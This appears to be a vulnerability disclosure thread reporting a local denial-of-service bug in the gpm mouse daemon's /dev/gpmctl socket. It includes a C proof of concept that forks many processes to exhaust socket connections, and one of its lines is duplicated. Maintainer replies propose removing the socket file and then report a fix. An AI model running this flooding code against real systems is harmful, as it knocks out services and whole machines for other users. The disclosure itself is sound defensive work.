Hello. There is simmilar to sysklogd bug in gpm. It listening on /dev/gpmctl and uses STREAM. Any user can simply DoS the gpm and (in several circumstances) the whole system. Below is the sample code to DoS the gpm. I couldn't write an exploit to ALWAYS crash the whole system, but I did it few times. I don't know why it works and why not. I think that You are much better programmers than I so You can do it Yourself :) If i will write working exploit I will NOT public it, so don't worry. Solutions? I don't sure if the STREAM is needed by gpm. Maybe DGRAM will be good solution for that? Or maybe some changes of permissions on /dev/gpmctl? Best regards. Tomasz Grabowski (0-91)4333950 Akademickie Centrum Informatyki cadence.pl ------------------------------------------------------------------------- Below is the shutup.c writen by someone else. I made only few little changes to work with gpm. #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #define PATH "/dev/gpmctl" #define SHUTUPS 2000 #define PROCS 100 int main (void) { int s, i; struct sockaddr_un sun; char host[128]; sockaddr_un sun; char host[128]; sun.sun_family = AF_UNIX; strncpy (sun.sun_path, PATH, 100); gethostname (host, 128); if (fork ()) exit (0); for (i = 0; i < PROCS; i++) if (fork () == 0) break; for (i = 0; i < SHUTUPS; i++) { if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0) { perror ("socket"); while (1); } if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0) { perror ("connect"); close (s); i--; } } while (1); }
gpm does need STREAM. There's no easy fix for this one. If you change permissions on /dev/gpmctl, you lose functionality. The quickfix is to just rm /dev/gpmctl. This will prevent things like gpm-root from working, but basic gpm functionality is still there. I'm looking at it to see if/how it can be fixed without losing functionality.
Fixed.